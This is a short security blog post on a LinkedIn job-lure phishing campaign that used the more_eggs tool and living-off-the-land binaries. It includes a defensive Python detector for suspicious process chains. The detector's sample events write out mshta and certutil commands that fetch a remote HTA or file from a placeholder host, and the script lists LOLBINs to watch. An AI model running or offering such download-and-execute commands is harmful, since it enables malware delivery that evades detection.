LinkedIn and LOLBINs

Yet another example of how LinkedIn can be abused by the bad guys… a phishing campaign which used job titles scraped from user profiles to convince victims to open and execute evil files and links, which in this case used an attack tool called more_eggs. The eggy script executes in memory and uses native binaries (“living off the land”) to foil detection efforts.

This kind of simple and effective lure, combined with human beings’ propensity to click before they think, makes the defender’s job that much harder. Using LOLBINs to evade detection doesn’t help us either.

As usual, there ain’t no simple answer to this kind of problem… we need to combine:

User awareness training which focuses on two things: stopping and thinking before taking any action on an email and the fact that phishers use the information we post online to gain our trust.

Technical backstops – improved email and web filtering, and behavioral analysis of what our workstations (and users) are up to, to detect these stealthy attacks.
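To make the “behavioral analysis” backstop concrete, here is an added example (my code, not from the post or from any vendor tool) of the kind of simple rule a workstation-monitoring pipeline can run over process-creation events: it flags a mail client, Office app or browser spawning a well-known living-off-the-land binary, and separately flags a LOLBIN that is handed a URL on its command line. The log line format, the LOLBIN and parent lists, and the sample events are all constructed for the example; the placeholder.invalid host is not a real indicator.

```python
"""Added example: a lure-to-LOLBIN behavioral check over process-creation logs.

The event format below is an assumption made for this example, not a real
EDR or Sysmon schema; adapt the regex to whatever your telemetry emits.
"""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Well-known Windows living-off-the-land binaries (illustrative, not exhaustive).
LOLBINS = {
    "regsvr32.exe", "mshta.exe", "rundll32.exe", "certutil.exe",
    "wscript.exe", "cscript.exe", "powershell.exe", "msiexec.exe", "bitsadmin.exe",
}

# Processes that typically open an emailed attachment or link (assumption for this example).
LURE_PARENTS = {"outlook.exe", "winword.exe", "excel.exe", "chrome.exe", "msedge.exe"}


@dataclass
class ProcEvent:
    ts: str
    host: str
    parent: str
    image: str
    cmdline: str


# Constructed log format: <ts> host=<name> parent="<path>" image="<path>" cmdline="<args>"
LINE_RE = re.compile(
    r'^(?P<ts>\S+) host=(?P<host>\S+) parent="(?P<parent>[^"]*)" '
    r'image="(?P<image>[^"]*)" cmdline="(?P<cmdline>[^"]*)"$'
)


def parse_event(line: str) -> Optional[ProcEvent]:
    """Parse one constructed log line; return None for lines that do not match."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    return ProcEvent(m["ts"], m["host"], m["parent"], m["image"], m["cmdline"])


def basename(path: str) -> str:
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def suspicious(ev: ProcEvent) -> Optional[str]:
    """Return a human-readable reason if the event matches the pattern, else None."""
    child = basename(ev.image)
    parent = basename(ev.parent)
    if child not in LOLBINS:
        return None
    # Rule 1: a lure-handling app (mail, Office, browser) directly spawned a LOLBIN.
    if parent in LURE_PARENTS:
        return f"{parent} spawned LOLBIN {child}"
    # Rule 2: a LOLBIN was given a remote URL, a common sign of a download-and-run stage.
    if re.search(r"https?://", ev.cmdline, re.IGNORECASE):
        return f"LOLBIN {child} given a URL on its command line"
    return None


def scan(lines: List[str]) -> List[Tuple[str, str, str, str]]:
    """Run the rules over raw log lines; return (ts, host, reason, cmdline) per hit."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        if ev is None:
            continue
        reason = suspicious(ev)
        if reason:
            hits.append((ev.ts, ev.host, reason, ev.cmdline))
    return hits


# Constructed sample events: one benign Office launch, one lure-to-LOLBIN chain,
# one benign system use of rundll32, and one LOLBIN fetching a remote file.
SAMPLE_EVENTS = [
    r'2024-01-09T10:01:02Z host=WS01 parent="C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE" '
    r'image="C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE" cmdline="WINWORD.EXE /n resume.docx"',
    r'2024-01-09T10:01:09Z host=WS01 parent="C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE" '
    r'image="C:\Windows\System32\mshta.exe" cmdline="mshta.exe https://placeholder.invalid/job-offer.hta"',
    r'2024-01-09T10:02:30Z host=WS02 parent="C:\Windows\System32\services.exe" '
    r'image="C:\Windows\System32\rundll32.exe" cmdline="rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"',
    r'2024-01-09T10:03:45Z host=WS03 parent="C:\Windows\explorer.exe" '
    r'image="C:\Windows\System32\certutil.exe" cmdline="certutil.exe -urlcache -f https://placeholder.invalid/stage2.txt out.txt"',
]

if __name__ == "__main__":
    for ts, host, reason, cmdline in scan(SAMPLE_EVENTS):
        print(f"{ts} {host}: {reason} :: {cmdline}")
```

The parent-child rule is the cheaper and more precise of the two; the URL rule casts a wider net and will need tuning per environment (software deployment tools legitimately call some of these binaries), so in practice the two would be scored rather than treated as equal alerts.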

Like most scams, this one is 75% about human psychology and 25% about the technology used to pull it off – and we have to fight fire with fire, folks.
